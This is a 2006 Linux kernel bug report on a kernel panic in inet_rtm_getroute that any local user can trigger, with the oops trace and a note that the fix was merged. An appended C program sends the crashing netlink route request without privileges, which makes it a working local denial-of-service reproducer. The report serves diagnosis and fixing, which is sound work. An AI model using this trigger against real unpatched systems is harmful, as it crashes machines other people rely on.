Bug 6388

Summary: kernel panic in inet_rtm_getroute
Product: Networking
Reporter: Alexandra Kossovsky (Alexandra.Kossovsky)
Component: IPV4
Assignee: Stephen Hemminger (stephen)
Status: RESOLVED CODE_FIX
Severity: high
Priority: P2
Hardware: i386
OS: Linux
Kernel Version: 2.6.16.4 Tree: Mainline
Regression: ---

Description Alexandra Kossovsky 2006-04-14 01:40:15 UTC
Most recent kernel where this bug did not occur: 2.6.8 has this problem, I did
not try earlier kernels
Distribution: Debian
Hardware Environment: ethernet network card, I've tried i386 and x86_64 archs.
Software Environment:

Problem Description:
The following command from a user (even non-root) shell:
user-shell$ ip ro get 224.0.0.1 iif eth0
leads to kernel panic:
Unable to handle kernel NULL pointer dereference at virtual address 00000009
 printing eip:
c023c1c3
*pde = 00000000
Oops: 0000 [#1]
SMP
Modules linked in: autofs4 nfs lockd nfs_acl sunrpc dm_mod e100 mii e1000 ipv6
genrtc ext2 mbcache ide_disk generic piix ide_core evdev mousedev
CPU:    0
EIP:    0060:[<c023c1c3>]    Not tainted VLI
EFLAGS: 00010286   (2.6.16.4-1ol1 #1)
EIP is at ip_route_input+0xca/0x17e
eax: 00000000   ebx: c16a4600   ecx: 00000000   edx: de175180
esi: 010000e0   edi: 00000000   ebp: df4ba000   esp: dda01b64
ds: 007b   es: 007b   ss: 0068
Process ip (pid: 1531, threadinfo=dda00000 task=dff47560)
Stack: <0>00000000 de175180 de175180 ffffffed 00000000 c1581e00 c023d5dc de175180
       010000e0 00000000 00000000 df4ba000 dfe593d0 00000000 00000000 00000003
       010000e0 00000000 00000009 00000000 00000c14 c02e95cd df147800 c022b325
Call Trace:
 [<c023d5dc>] inet_rtm_getroute+0xf6/0x236
 [<c022b325>] rtnetlink_fill_ifinfo+0x3bc/0x50a
 [<c022b37c>] rtnetlink_fill_ifinfo+0x413/0x50a
 [<c022b4b3>] rtnetlink_dump_ifinfo+0x40/0x65
 [<c022ba74>] rtnetlink_rcv_msg+0x1c4/0x1e7
 [<c022b8b0>] rtnetlink_rcv_msg+0x0/0x1e7
 [<c02372f3>] netlink_rcv_skb+0x3a/0x8f
 [<c023738a>] netlink_run_queue+0x42/0xc4
 [<c022b8b0>] rtnetlink_rcv_msg+0x0/0x1e7
 [<c022b8b0>] rtnetlink_rcv_msg+0x0/0x1e7
 [<c022b85e>] rtnetlink_rcv+0x22/0x40
 [<c022b8b0>] rtnetlink_rcv_msg+0x0/0x1e7
 [<c0236d0a>] netlink_data_ready+0x17/0x54
 [<c0236145>] netlink_sendskb+0x1f/0x39
 [<c0236b0c>] netlink_sendmsg+0x281/0x292
 [<c021b241>] sock_sendmsg+0xe6/0x104
 [<c021b38e>] sock_recvmsg+0xf3/0x111
 [<c021b241>] sock_sendmsg+0xe6/0x104
 [<c0129df6>] autoremove_wake_function+0x0/0x3a
 [<c01b4b49>] copy_from_user+0x3a/0x5d
 [<c0220e81>] verify_iovec+0x49/0x7f
 [<c021c8a7>] sys_sendmsg+0x158/0x1ae
 [<c013a88b>] get_page_from_freelist+0x70/0x88
 [<c013a8e9>] __alloc_pages+0x46/0x263
 [<c01422a4>] do_anonymous_page+0xc5/0x148
 [<c0111b34>] do_page_fault+0x18a/0x4e0
 [<c01b4b49>] copy_from_user+0x3a/0x5d
 [<c021cc25>] sys_socketcall+0x167/0x180
 [<c01119aa>] do_page_fault+0x0/0x4e0
 [<c01026af>] sysenter_past_esp+0x54/0x75
Code: e0 34 c0 ff 40 38 8b 09 85 c9 75 a0 89 f0 25 f0 00 00 00 3d e0 00 00 00 75
66 8b 9d a8 00 00 00 85 db 74 55 8b 54 24 04 8b 42 20 <0f> b6 40 09 50 57 56 53
e8 bd 71 02 00 83 c4 10 89 c2 85 c0 75
 <0>Kernel panic - not syncing: Fatal exception in interrupt

The backtrace is slightly different for different kernel versions and hardware types. The
trace above is for 2.6.16.4.

Steps to reproduce:
run shell command "ip ro get 224.0.0.1 iif eth0"

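What the reproduction command puts on the wire, as an added example (this is not code from the report, the kernel, or iproute2): "ip ro get 224.0.0.1 iif eth0" sends a single RTM_GETROUTE request over a NETLINK_ROUTE socket, which any local user can open, carrying RTA_DST = 224.0.0.1 and RTA_IIF = the ifindex of eth0. RTA_IIF is what makes inet_rtm_getroute resolve the route through ip_route_input (the receive path) rather than the output path, and the multicast destination selects the branch of ip_route_input that faults in the trace above. The faulting instruction in the Code line, 0f b6 40 09, is a movzx of the byte at offset 9 through a NULL eax, which matches the fault address 00000009 and the offset of the protocol field in struct iphdr; that is consistent with the multicast branch reading an IP header that the synthetic request skb does not carry. The struct, function and buffer names below are this example's own. It builds the message so the two attributes can be inspected, and main() sends it; on a kernel with the fix the reply is a route or an NLMSG_ERROR, not an oops.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <net/if.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>

/* Example's own layout of the RTM_GETROUTE request (hypothetical names, not iproute2's). */
struct getroute_req {
    struct nlmsghdr nlh;
    struct rtmsg rtm;
    char attrs[64];              /* room for RTA_DST and RTA_IIF */
};

/* Append one rtattr TLV to the message; returns -1 if it would not fit. */
static int add_attr(struct nlmsghdr *nlh, size_t maxlen, unsigned short type,
                    const void *data, unsigned short len)
{
    size_t need = NLMSG_ALIGN(nlh->nlmsg_len) + RTA_ALIGN(RTA_LENGTH(len));
    struct rtattr *rta;
    if (need > maxlen)
        return -1;
    rta = (struct rtattr *)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len));
    rta->rta_type = type;
    rta->rta_len = RTA_LENGTH(len);
    memcpy(RTA_DATA(rta), data, len);
    nlh->nlmsg_len = (uint32_t)need;
    return 0;
}

/* Build "ip route get <dst> [iif <ifindex>]"; returns total message length or -1. */
int build_getroute(struct getroute_req *req, const char *dst, uint32_t iif)
{
    struct in_addr a;
    memset(req, 0, sizeof *req);
    if (inet_pton(AF_INET, dst, &a) != 1)
        return -1;
    req->nlh.nlmsg_len = NLMSG_LENGTH(sizeof(struct rtmsg));
    req->nlh.nlmsg_type = RTM_GETROUTE;
    req->nlh.nlmsg_flags = NLM_F_REQUEST;
    req->nlh.nlmsg_seq = 1;
    req->rtm.rtm_family = AF_INET;
    req->rtm.rtm_dst_len = 32;   /* full-length destination, as "ip route get" sends */
    if (add_attr(&req->nlh, sizeof *req, RTA_DST, &a, sizeof a) < 0)
        return -1;
    /* RTA_IIF is the attribute that switches the kernel to the input (receive) lookup. */
    if (iif && add_attr(&req->nlh, sizeof *req, RTA_IIF, &iif, sizeof iif) < 0)
        return -1;
    return (int)req->nlh.nlmsg_len;
}

/* Walk the attributes of a built request and return the first of the given type. */
struct rtattr *find_attr(struct getroute_req *req, unsigned short type)
{
    struct rtattr *rta = RTM_RTA(&req->rtm);
    int len = RTM_PAYLOAD(&req->nlh);
    for (; RTA_OK(rta, len); rta = RTA_NEXT(rta, len))
        if (rta->rta_type == type)
            return rta;
    return NULL;
}

/* 1 if the request selects the path the report crashes in: multicast dst plus an iif. */
int is_multicast_input_lookup(struct getroute_req *req)
{
    struct rtattr *dst = find_attr(req, RTA_DST);
    struct rtattr *iif = find_attr(req, RTA_IIF);
    uint32_t d;
    if (!dst || !iif)
        return 0;
    memcpy(&d, RTA_DATA(dst), sizeof d);
    return IN_MULTICAST(ntohl(d)) ? 1 : 0;
}

int main(int argc, char **argv)
{
    const char *dst = argc > 1 ? argv[1] : "224.0.0.1";
    const char *dev = argc > 2 ? argv[2] : "eth0";
    struct getroute_req req;
    char reply[4096];
    struct nlmsghdr *rh;
    uint32_t iif = if_nametoindex(dev);
    int len, fd;

    if (!iif) { perror(dev); return 1; }
    len = build_getroute(&req, dst, iif);
    if (len < 0) { fprintf(stderr, "bad destination %s\n", dst); return 1; }
    printf("RTM_GETROUTE %d bytes, dst=%s iif=%u, multicast input lookup: %s\n",
           len, dst, iif, is_multicast_input_lookup(&req) ? "yes" : "no");

    fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);   /* no privilege required */
    if (fd < 0) { perror("socket"); return 1; }
    if (send(fd, &req, len, 0) < 0) { perror("send"); return 1; }
    len = (int)recv(fd, reply, sizeof reply, 0);
    if (len < 0) { perror("recv"); return 1; }
    rh = (struct nlmsghdr *)reply;
    if (rh->nlmsg_type == NLMSG_ERROR) {
        struct nlmsgerr *e = NLMSG_DATA(rh);
        printf("kernel answered error %d (%s)\n", -e->error, strerror(-e->error));
    } else {
        printf("kernel answered message type %u, %u bytes\n", rh->nlmsg_type, rh->nlmsg_len);
    }
    close(fd);
    return 0;
}
```

Build with cc -o getroute getroute.c and run ./getroute 224.0.0.1 eth0 as an ordinary user; the send() succeeding without any capability check is the point of the "even non-root" remark in the report.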
Comment 1 Stephen Hemminger 2006-04-18 10:11:50 UTC
Bug fix has been integrated into current 2.6.17 tree and submitted for 2.6.16.7